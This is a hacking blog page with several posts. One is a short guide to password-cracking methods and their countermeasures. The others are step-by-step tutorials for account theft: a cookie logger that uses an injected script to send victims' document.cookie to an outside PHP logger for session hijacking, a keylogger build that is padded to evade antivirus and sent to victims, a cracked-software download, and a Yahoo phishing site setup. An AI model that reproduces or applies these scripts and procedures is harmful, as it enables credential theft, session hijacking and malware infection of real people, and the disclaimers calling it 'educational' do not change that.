Breaking News
Loading...

Recent Post

Showing posts with label Yahoo Hack. Show all posts
Showing posts with label Yahoo Hack. Show all posts
Monday, January 13, 2014
6 Most Common Password Cracking Methods And Their Countermeasures

6 Most Common Password Cracking Methods And Their Countermeasures


There are number of methods out their used by hackers to hack your account or get your personal information. Today in this post i will share with you guys 6 Most commonly used method to crack password and their countermeasures. You must check out this article to be safe and to prevent your online accounts from hacking.
1. Brute Force Attack

Any password can be cracked using Brute-force attack. Brute-force attacks try every possible combinations of numbers, letters and special characters until the right password is match. Brute-force attacks can take very long time depending upon the complexity of the password. The cracking time is determined by the speed of computer and complexity of the password.

Countermeasure: Use long and complex passwords. Try to use combination of upper and lowercase letters along with numbers. Brute-force attack will take hundreds or even thousands of years to crack such complex and long passwords.
Example: Passwords like "iloveu" or "password" can be cracked easily whereas computer will take years to crack passwords like "aN34lL00"

2. Social Engineering

Social engineering is process of manipulating someone to trust you and get information from them. For example, if the hacker was trying to get the password of a co-workers or friends computer, he could call him pretending to be from the IT department and simply ask for his login details. Sometime hackers call the victim pretending to be from bank and ask for their credit cards details. Social Engineering can be used to get someone password, to get bank credentials or any personal information.

Countermeasure: If someone tries to get your personal or bank details ask them few questions. Make sure the person calling you is legit. Never ever give your credit card details on phone.

3. Rats And Keyloggers


In keylogging or RATing the hacker sends keylogger or rat to the victim. This allows hacker to monitor every thing victim do on his computer. Every keystroke is logged including passwords. Moreever hacker can even control the victims computer.

Countermeasure: Never login to your bank account from cyber cafe or someone else computer. If its important use on-screen or virtual keyboard while tying the login. Use latest anti-virus software and keep them updated. Check out below article to know more about Rats and Keyloggers.

4. Phishing


Phishing is the most easiest and popular hacking method used by hackers to get someone account details. In Phishing attack hacker send fake page of real website like facebook, gmail to victim. When someone login through that fake page his details is send to the hacker. This fake pages can be easily created and hosted on free web-hosting sites.

Countermeasure: Phishing attacks are very easy to avoid. The url of this phishing pages are different from the real one. For example URL of phishing page of facebook might look like facbbook.com (As you can see There are two "b"). Always make sure that websites url is correct. Check out below article to know more about phishing.

5. Rainbow Table

A Rainbow table is a huge pre-computed list of hashes for every possible combination of characters. A password hash is a password that has gone through a mathematical algorithm such as md5 and is transformed into something which is not recognizable. A hash is a one way encryption so once a password is hashed there is no way to get the original string from the hashed string. A very commonly used hashing algorithm to store passwords in website databases is md5. It is almost similar to dictionary attack, the only difference is, in rainbow tables attack hashed characters are used as passwords whereas in dictionary attack normal characters are used as passwords. 

Example: ‘hello’ in md5 is 5d41402abc4b2a76b9719d911017c592 and zero length string ("") is d41d8cd98f00b204e9800998ecf8427e

Countermeasure: Make sure you choose password that is long and complex. Creating tables for long and complex password takes a very long time and a lot of resources

6. Guessing


This seems silly but this can easily help you to get someones password within seconds. If hacker knows you, he can use information he knows about you to guess your password. Hacker can also use combination of Social Engineering and Guessing to acquire your password.

Countermeasure: Don't use your name, surname, phone number or birthdate as your password. Try to avoid creating password that relates to you. Create complex and long password with combination of letters and numbers.

Tags:- #Passwordcrack,#Password,#Crack,#BruteForceAttack,#Phishing,#md5
Monday, April 15, 2013
How to hack into an email account - Cookie Logger

How to hack into an email account - Cookie Logger

Well one of the question which is asked most to me is,"How to hack into an email account",So today i am posting a new way to hack into an email account,I am not posting this post to excite hackers but to make you aware of whats going around

Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc.
What is a Cookie Logger?

A Cookie Logger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.

Today I am going to show How to make your own Cookie Logger


Note :- This Tutorial is For Education Purpose Only… & Its For Better Security For Ur Self…




Step 1  :- First you have to create a file which can capture a person's cookie.So follow the following process.

  
<script>location.href='http://www.hackdworld-lk.blogspot.com/cookielogger.php?cookie='+escape(document.cookie)</SCRIPT>


Step 2 :- Now you have to change "http://www.hackdworld-lk.blogspot.com/" to your site, Remember one thing you should not upload the files into a directory.

Now open notepad and paste the script in it and save it as fun.gif

Step 3 :- Copy the Following Script into a Notepad File and Save the file as cookielogger.php:

 $filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>

Step 4 :-  Create a new Notepad File and Save it as logfile.txt

Upload this file to your server

 cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif

If you don’t have any Website then you can use the following Website to get a Free Website which has php support :

www.ofees.net
www.t35.com
www.ripway.com
http://my3gb.com/
http://000webhost.com/

Step 5:- Now your cookie logger is ready to be used. Now All U Had To Do is Find The Victim & Try Cookie Logger / Cookie Stealer On Them…

Note :- Give Ur Victim The Link Of GIF File… 

 http://www.yoursite.com/fun.gif

So the person who click it will think it is fun.jpg but it redirects to fun.gif


Step 6 :- So if anyone click the image you will get a temporary error and you will find the cookie in the logfile.txt


Step 7 :- And something like this will be stored in your "logfile.txt"

 phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9

Step 8 :- To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.

Now for this you will need a firefox addon named "Add and edit cookies

Note :- Make Sure that ur Victim should be Online because u are Hijacking ur Victim’s Session…


So if the Victim clicks on Logout you will also Logout automatically…
but once you have changed the password then you can again login with the new password… but the victim would not be able to login with it…

MUST READ :- I don’t take any responsibility for what you do with this script…Its Only for Educational purpose only…


How To Get Secure From Cookie Loggers / Cookie Stealer ???
 
Don’t Click On Any Links Given By Anyone…
Use Secure Connection Security In Facebook…
Use Login Notifications For Better Security…
Don’t Click On SPAM Links Videos Or Pics…
Never Ever Try RATS or KeyLoggers…
Be Safe…Don’t Use Any Softwares For Hacking…Coz All Are Fakes…
Hacking is Not Playing With SomeOne’s Account… 
Real Hacking is Much More Than It…
All The Hackers are Not Same… We are Humans & We Had Heart Also…
So, Wake Up Fast… With The New Techys…
Monday, July 9, 2012
no image

How To Login With Multiple Facebook Accounts Simultaneously




If you have more than one accounts in facebook,orkut,twitter or want to login with multiple e-mail ids ,then dont worry their is a way to do this.Through this you can login with multiple facebook,orkut,twitter accounts at the same time.If you are using Mozilla Firefox and Google chrome browser then their is a easiest way to do this.

Login with Multiple Accounts On Firefox

Step 1: Create a firefox shortcut on the desktop.
Step 2: Right click on shortcut of firefox and click on Properties 
Step 3: Now, at the end of Firefox Target, you need to add the following code at the end of the path.

 -profilemanager –no-remote

for eg : "C:\Program Files\Mozilla Firefox\firefox.exe" -profilemanager -no-remote

Step 4: create a new profile and click on Start Firefox.


Login with Multiple Accounts on Google Chrome

If you are using facebook,orkut,twitter ,gmail...etc on Google Chrome, the only way to login multiple accounts, then you can do this by operating in Incognito mode.
So just press Ctrl + Shift + N, you can launch Incognito browser where you can login with another accounts.
no image

Email Hacking Via Keylogger


Here is a step by step guide to hack someones email password using a keylogger:

1. First of all download

ARDAMAX KEYLOGGER from here : 

serial file from here


2. Run Star Tools.exe file. Hit on Tools and select Keylogger.




3. Now, you get Keylogger builder

4. Simply enter your Gmail username and password where you want to receive your victim’s password. You can set Timing Options as you like and hit on “Build Keylogger” to get Server.exe file created in current directory.

5. This server.exe file is 3/23 UD and detected by Avira antivirus. So, to avoid it from being detected by Antivirus, Go to Tools -> File Pumper to see

6. Now, select the server.exe file you have just created in step 4. Set the number of bytes you want to add using File Pumper (you can set anything like approx 1 MB or even more) and hit on “Pump File”. File Pumper will ask you the name and path where you want to save pumped file created by File Pumper. Select the path and hit on Save. Say this file is named ser.exe.

7. Now, send this file to victim and ask him to run the file on his computer. As soon as he runs our sent file, the keylogger get installed on his computer and all his typed passwords and keystrokes are sent to your email address which you have entered in step 4.
Monday, July 2, 2012
no image

ARDAMAX KEYLOGGER V3.8.9 LATEST [FULL] [FREE] [CRACK] [SERIAL KEY]


Ardamax Keylogger is a keystroke recorder that captures user's activity and saves it to an encrypted log file. The log file can be viewed with the powerful Log Viewer. Use this tool to find out what is happening on your computer while you are away, maintain a backup of your typed data automatically or use it to monitor your kids. Also you can use it as a monitoring device for detecting unauthorised access. Logs can be automatically sent to your e-mail address, access to the keylogger is password protected. Besides, Ardamax Keylogger logs information about the Internet addresses the user has visited.

This invisible spy application is designed for 2000, XP, 2003, Vista and Windows 7.



Keylogger Features:

* Email log delivery - keylogger can send you recorded logs through e-mail delivery at set times - perfect for remote monitoring!
* FTP delivery - Ardamax Keylogger can upload recorded logs through FTP delivery.
* Network delivery - sends recorded logs through via LAN.
* Clipboard logging - capture all text copied to the Windows Clipboard.
* Invisible mode makes it absolutely invisible to anyone. Ardamax Keylogger is not visible in the task bar, system tray, Windows 2000/XP/2003/Vista/Windows 7 Task Manager, process viewers (Process Explorer, WinTasks etc.), Start Menu and Windows Startup list.
* Visual surveillance - periodically makes screenshots and stores the compressed images to log.
* Chat monitoring - Ardamax Keylogger is designed to record and monitor both sides of a conversation in following chats:
o AIM
o Windows Live Messenger 2011
o ICQ 7
o Skype 4
o Yahoo Messenger 10
o Google Talk
o Miranda
o QiP 2010
* Security - allows you to protect program settings, Hidden Mode and Log file.
* Application monitoring - keylogger will record the application that was in use that received the keystroke!
* Time/Date tracking - it allows you to pinpoint the exact time a window received a keystroke!
* Powerful Log Viewer - you can view and save the log as a HTML page or plain text with keylogger Log Viewer.
* Small size – Ardamax Keylogger is several times smaller than other programs with the same features. It has no additional modules and libraries, so its size is smaller and the performance is higher.
* Ardamax Keylogger fully supports Unicode characters which makes it possible to record keystrokes that include characters from Japanese, Chinese, Arabic and many other character sets.
* It records every keystroke. Captures passwords and all other invisible text.

Other Features:

* Windows 2000/2003/XP/Vista/Windows 7 support
* Monitors multi-user machines
* Automatic startup
* Friendly interface
* Easy to install

Enjoy;)

Download: This file is full Ardamax (Latest) Keylogger with no activation needed, downloaded from their official site. Just Downlaod and ENJOY ;)


SERIAL KEY :
==========
DOWNLOAD SERIAL KEY

HACK YAHOO BY MAKING YAHOO PHISHING SITE TUTORIAL

HACK YAHOO BY MAKING YAHOO PHISHING SITE TUTORIAL




Ok friend Today I am going to show you How to Make the Yahoo! Phishing Site, with which you can easily Hack your friends and fellows, just you have to copy the following Steps.


Step 1: The First Step in Making the site is to regester an account at http://www.p4o.net/signup.php (if you have account than you can skip first 2 steps)



Step 2: Now Goto your email account that you gave and confirm your account with confirmation link

Step 3: Now Download this FILE ( http://adf.ly/AGqP4 ) .

Step 4: Now Goto http://www.p4o.net/login.php and Log into your account.

Step 5: Now when you are logged into your account click on the Online File Manager under File Management.

Step 6: Now Click on the htdocs and then on Upload Button.

Step 7: Now choose the file under the Archives that you have downloaded, to be uploaded.

Step 7: Now any one who visits your site would be taken to the Fake Facebook Login Page. After they enter their Username and Password, they will be taken to another page that will show them error. So there is less chance that it will be detected.


NOTE::: To access the input data ( Usernames and Password ) Goto the Following Address:

http://www.yoursitesadress.p4o.net/lol.txt



If I am not clear in any point Please ask me in comments below.
THE DOWNLOAD LINK TO Yahoo.zip is http://adf.ly/AGqP4
Copyright © 2012 DzireZOne All Right Reserved
Designed by Pirate Rex